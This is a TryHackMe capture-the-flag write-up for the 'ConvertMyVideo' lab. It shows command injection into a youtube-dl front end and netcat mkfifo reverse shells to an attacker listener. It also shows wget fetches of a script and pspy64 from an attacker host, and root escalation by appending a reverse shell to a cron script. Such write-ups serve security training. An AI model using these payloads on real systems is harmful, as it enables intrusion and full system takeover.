TryHackMe: ConvertMyVideo

  1. What is the name of the secret folder?

Port scan

nmap -Pn <ip>

There’re 2 ports: 22 and 80

OS and service scan

nmap -A -p 22,80 <ip>

Port 22 is OpenSSH and port 80 is Apache HTTP.

This machine is Ubuntu.

Vuln scan

nmap --script vuln -p 22,80 <ip>

There’s /admin/ directory.

Access site. I have to input some Youtube video’s id.

View page source, nothing.

Try input “test”

Nothing happened

Intercept w/ Burp Suite

Send to repeater

There’s an error.

Google error result, I came across to youtube-dl on github.

After reading through github. I came across to this. I may be able to do the command injection.

I will inject with

`whoami`

When I do the injection I will use backtick ` before any symbols, because It has precedence over others.

Success!!!

Let’s get reverse shell.

Prepare listener on port 1234

nc -lvp 1234

Prepare reverse shell

Reference:

I will use this command:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

After paste it, I need to replace the space.

I will try with “%20”

After paste it, I need to replace “&”.

Replace with “%26”

Error

Seems like replacing space with “%20” is not work. I will try with ${IFS} instead.

Paste it

Back to listener I have a connection. But I lost it so fast.

Let’s try another way

I will upload a script and run it.

Create script.sh using the same reverse shell command

Create HTTP server for uploading

python -m SimpleHTTPServer 80

Back to repeater

wget${IFS}http://<ip>/script.sh

Download success

Run the script

bash${IFS}script.sh

Now I have a shell.

2. What is the user to access the secret folder?

Get TTY shell

python -c 'import pty;pty.spawn("/bin/bash");'

I know that there’s ‘/admin’ directory. Let’s explore the system

ls
cd adminlscat flag.txt

Now I have user’s flag.

cat index.php

Nothing

ls -la

There’re hidden files.

cat .htpasswd

3. What is the user flag?
ANS: It’s in #2

4. What is the root flag?

Let’s escalate the priv.

Sudo

sudo -l

SUID

find / -perm -u=s -type f 2>/dev/null

Cronjob

cat /etc/crontab

Capabilities

getcap -r / 2>/dev/null

Looking for service

ps aux | grep "^root"

There’s cron running, but I don’t know where the file is.

Let’s upload pspy to observe service

I need to verify machine first

uname -a

This machine is 64-bit. I need to upload pspy64

wget http://<ip>/pspy64

Change its permission

chmod +xs pspy64

Run pspy64

./pspy64

After waiting about 1–2 mins. I found the script.

cat /var/www/html/tmp/clean.sh

I can append it with reverse shell command.

Prepare listener on port 1235

Here’s my command

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 1235 >/tmp/f

Append

echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 1235 >/tmp/f” >> /var/www/html/tmp/clean.sh

Verify appending

cat /var/www/html/tmp/clean.sh

Back to listener port 1235

whoami

I’m root.

cd /rootlscat root.txt